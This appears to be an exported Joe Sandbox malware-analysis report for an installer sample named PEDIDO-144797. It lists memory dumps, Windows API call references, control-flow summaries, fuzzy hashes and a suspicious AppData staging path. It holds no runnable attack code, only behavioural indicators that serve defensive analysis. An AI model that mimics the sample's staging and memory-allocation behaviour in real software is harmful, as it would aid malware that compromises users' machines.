• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: CloseValuelstrlen
• String ID: C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp
• API String ID: 2655323295-606440572
• Opcode ID: e48b1e85c28757713ab227aa479e2b9ceb42c74d784ae5642fab68139845f862
• Instruction ID: 1eab41df84c6b24c6b923ea001d17cdc0cfdc7d4c8a499a75fdfc4da8179f3fa
• Opcode Fuzzy Hash: e48b1e85c28757713ab227aa479e2b9ceb42c74d784ae5642fab68139845f862
• Instruction Fuzzy Hash: A1118171E00108AFEB10AFA5DE49EAEBAB4EB54354F11803AF504F71D1DBB84D459B58

Control-flow Graph
• Basic blocks 402d2a-402dd4; calls subfunctions 40621d and 40678a and recurses into itself (block 402d68-402d7c calls 402d2a for each subkey returned by RegEnumKeyW in block 402d7e-402d93); API calls RegCloseKey (blocks 402d95-402da7 and 402db6-402dc2) and RegDeleteKeyW (block 402dc4-402dca)
APIs
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
• RegCloseKey.ADVAPI32(?), ref: 00402D98
• RegCloseKey.ADVAPI32(?), ref: 00402DB9
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: Close$Enum
• String ID:
• API String ID: 464197530-0
• Opcode ID: df4bd2222173038e22a6f7143f63260fc380016edffd80d7804df4238b5218be
• Instruction ID: 0f4b1bf7762f76a333ccd5711aab570045f86c75fcf3a50f9e11fcc9d843940a
• Opcode Fuzzy Hash: df4bd2222173038e22a6f7143f63260fc380016edffd80d7804df4238b5218be
• Instruction Fuzzy Hash: 21116A32540509FBDF129F90CE09BEE7B69EF58344F110076B905B50E0E7B5DE21AB68

Control-flow Graph
• Basic blocks 4015c1-40224a, exiting through 402885-40288c and 402abf-402ace; calls subfunctions 402c37, 405d2c, 405cae, 405960, 40597d, 4058e3, 401423 and 4063b0; API calls GetFileAttributesW (block 401617-401622, inside the loop over blocks 4015d7-40162f) and SetCurrentDirectoryW (block 401636-401655)
APIs
  • Part of subcall function 00405D2C: CharNextW.USER32(?,?,00425F30,?,00405DA0,00425F30,00425F30,?,?,77762EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,77762EE0,00000000), ref: 00405D3A
  • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D3F
  • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D57
• GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
  • Part of subcall function 004058E3: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405926
• SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\sludrehovedet\mississippi,?,00000000,000000F0), ref: 0040164D
Strings
• C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\sludrehovedet\mississippi, xrefs: 00401640
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                          • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\sludrehovedet\mississippi
                                                                                                                                          • API String ID: 1892508949-2076318099
                                                                                                                                          • Opcode ID: 63e3afcb8f518b8f961fa91b0460bec2abaa85340c93af8d37e8798651ac2648
                                                                                                                                          • Instruction ID: a4cb8c34a70438e14e420fb04ab38ad532f12a03bdfc5322accc4ce246dd33dc
                                                                                                                                          • Opcode Fuzzy Hash: 63e3afcb8f518b8f961fa91b0460bec2abaa85340c93af8d37e8798651ac2648
                                                                                                                                          • Instruction Fuzzy Hash: 9011BE31504104EBCF31AFA0CD0199F36A0EF14368B28493BEA45B22F1DB3E4D51DA4E
                                                                                                                                          APIs
                                                                                                                                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059BE
                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004059CB
                                                                                                                                          Strings
                                                                                                                                          • Error launching installer, xrefs: 004059A8
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                          • String ID: Error launching installer
                                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                                          • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                                                          • Instruction ID: 7702c274cdf70951028335e9b96fa9876c0cc9a795fc840707e03dbfe60e7272
                                                                                                                                          • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                                                          • Instruction Fuzzy Hash: B4E046F0A00209BFEB009BA4ED09F7BBAACFB04208F418431BD00F6190D774A8208A78
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 86ce5b7836e8efc76d9880a3b815598044ae852516a7a266a4593ffa0bd4c046
                                                                                                                                          • Instruction ID: 1a1db7b112f5c349f32c040b215ce8adb2231ea54f988815808aa67dfaaa6b76
                                                                                                                                          • Opcode Fuzzy Hash: 86ce5b7836e8efc76d9880a3b815598044ae852516a7a266a4593ffa0bd4c046
                                                                                                                                          • Instruction Fuzzy Hash: 6AA15271E04228CBDF28CFA8C8446ADBBB1FF44305F14816ED856BB281D7786A86DF45
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: f289ec4eae441b973c5cf469eb2209b78d92787f90c2f70d8ea77383fdb072af
                                                                                                                                          • Instruction ID: 81ced8d75bd8cd674d530aa485ef516b0f39a629971cfce93107e9c84bdcedbb
                                                                                                                                          • Opcode Fuzzy Hash: f289ec4eae441b973c5cf469eb2209b78d92787f90c2f70d8ea77383fdb072af
                                                                                                                                          • Instruction Fuzzy Hash: 4E912170E04228CBDF28CFA8C8547ADBBB1FB44305F14816ED856BB281D778A986DF45
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 36b8550c79165f3bd8438b4b7b77fc639822643401bcc62ffa2a7152ccecd571
                                                                                                                                          • Instruction ID: 6e186065c07e551db02da0b657444ed8a40fac9cbefa0218a87430385e41b7b0
                                                                                                                                          • Opcode Fuzzy Hash: 36b8550c79165f3bd8438b4b7b77fc639822643401bcc62ffa2a7152ccecd571
                                                                                                                                          • Instruction Fuzzy Hash: F7814571E04228CFDF24CFA8C8447ADBBB1FB45305F24816AD856BB281C778A996DF45
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: fd90919654d861d793b9259fd4ddd35531221e69384e43b7f209bc021a7cca94
                                                                                                                                          • Instruction ID: 1a645af2666a8cd9619cdf871bd9e2c738fb6a6c353dc56c4864b2e7a25bf22b
                                                                                                                                          • Opcode Fuzzy Hash: fd90919654d861d793b9259fd4ddd35531221e69384e43b7f209bc021a7cca94
                                                                                                                                          • Instruction Fuzzy Hash: 71816771E04228DBEF28CFA8C8447ADBBB1FB44301F14816AD956BB2C1C7786986DF45
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          APIs
                                                                                                                                          • GetTickCount.KERNEL32 ref: 004032D6
                                                                                                                                            • Part of subcall function 00403441: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313F,?), ref: 0040344F
                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031EC,00000004,00000000,00000000,?,?,00403166,000000FF,00000000,00000000,0040A230,?), ref: 00403309
                                                                                                                                          • SetFilePointer.KERNELBASE(00149F32,00000000,00000000,00414ED0,00004000,?,00000000,004031EC,00000004,00000000,00000000,?,?,00403166,000000FF,00000000), ref: 00403404
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FilePointer$CountTick
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1092082344-0
                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402057
                                                                                                                                            • Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                                                                                            • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                                                                                            • Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC,00402EEC,00422708,00000000,00000000,00000000), ref: 0040546F
                                                                                                                                            • Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                                                                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                                                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                                                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402068
                                                                                                                                          • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020E5
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 334405425-0
                                                                                                                                          APIs
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00401BE1
                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Global$AllocFree
                                                                                                                                          • String ID: Call
                                                                                                                                          • API String ID: 3394109436-1824292864
                                                                                                                                          • Opcode ID: 6a27723cd33979d5ccceb52c727bba02617a76204f9552189d3104983f6bb1b5
                                                                                                                                          • Instruction ID: 81df35259a3df780e2a5f09322996839f14f5544e2eb4a40810e3e9637107665
                                                                                                                                          • Opcode Fuzzy Hash: 6a27723cd33979d5ccceb52c727bba02617a76204f9552189d3104983f6bb1b5
                                                                                                                                          • Instruction Fuzzy Hash: 06218E72A40140DFDB20EB949E8495E77B9AF44314B25413BFA02F72D1DB789851CB9D
APIs
• RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
• RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402538
• RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp,00000000,00000011,00000002), ref: 00402551
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: Enum$CloseValue
• String ID:
• API String ID: 397863658-0
• Opcode ID: 297b237e24fbbf63aa7ca08728d7b3950c3333922afcc1c5b6d3d1192ed08725
• Instruction ID: 4fa2f3c06f6248971957712acf2942ced6ba336c37b2851dfbda8b2cd28c17b0
• Opcode Fuzzy Hash: 297b237e24fbbf63aa7ca08728d7b3950c3333922afcc1c5b6d3d1192ed08725
• Instruction Fuzzy Hash: 6D017171904104EFE7159FA5DE89ABFB6B8EF44348F10403EF105A62D0DAB84E459B69
APIs
• VirtualAllocEx.KERNELBASE(00000000), ref: 1000295B
• GetLastError.KERNEL32 ref: 10002A62
Memory Dump Source
• Source File: 00000000.00000002.89705298637.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.89705275487.0000000010000000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.89705326435.0000000010003000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.89705350965.0000000010005000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_PEDIDO-144797.jbxd
Similarity
• API ID: AllocErrorLastVirtual
• String ID:
• API String ID: 497505419-0
• Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
• Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
• Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
• Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55
APIs
• SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403166,000000FF,00000000,00000000,0040A230,?), ref: 004031DF
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: af526002166308cc95fa76d49654f36d838bd7a13899b6376ccfe278c881acad
• Instruction ID: 4c6ae7a0626839fce45d877b24888c0af913333af22313e68c4d1644c71cb298
• Opcode Fuzzy Hash: af526002166308cc95fa76d49654f36d838bd7a13899b6376ccfe278c881acad
• Instruction Fuzzy Hash: 3B319C3020021AFFDB109F95ED84ADB3F68EB04359B1085BEF904E6190D778CE509BA9
APIs
• RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
• RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp,00000000,00000011,00000002), ref: 00402551
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: CloseQueryValue
• String ID:
• API String ID: 3356406503-0
• Opcode ID: a3b88ef37a04c447d509aafcd647c8bb55f7a85eb83bcf9e8b78a58130226466
• Instruction ID: 2d27e3624369fee7c217219a4e344138e42523264533ea489648bddc6477d6d2
• Opcode Fuzzy Hash: a3b88ef37a04c447d509aafcd647c8bb55f7a85eb83bcf9e8b78a58130226466
• Instruction Fuzzy Hash: 53119171900209EBEB24DFA4CA585AEB6B4EF04344F20843FE046A62C0D7B84A45DB5A
APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
• SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
• Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
• Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
• Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
APIs
• RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
• RegCloseKey.ADVAPI32(00000000), ref: 004023B3
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
Similarity
• API ID: CloseDeleteValue
• String ID:
• API String ID: 2831762973-0
• Opcode ID: 3500e27f67e3657d3f13e648c5a4e4955d4a6b8459d35a1d73aadda57e6becb1
• Instruction ID: eeebe11236d86b478005370e27fb04b66889edd8f93d7ff1d49de92df4b57ee5
• Opcode Fuzzy Hash: 3500e27f67e3657d3f13e648c5a4e4955d4a6b8459d35a1d73aadda57e6becb1
• Instruction Fuzzy Hash: 58F09632A04114DBE711BBA49B4EABEB2A59B44354F16053FFA02F71C1DEFC4D41866D
APIs
• ShowWindow.USER32(00000000,00000000), ref: 00401E61
• EnableWindow.USER32(00000000,00000000), ref: 00401E6C
Memory Dump Source
• Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
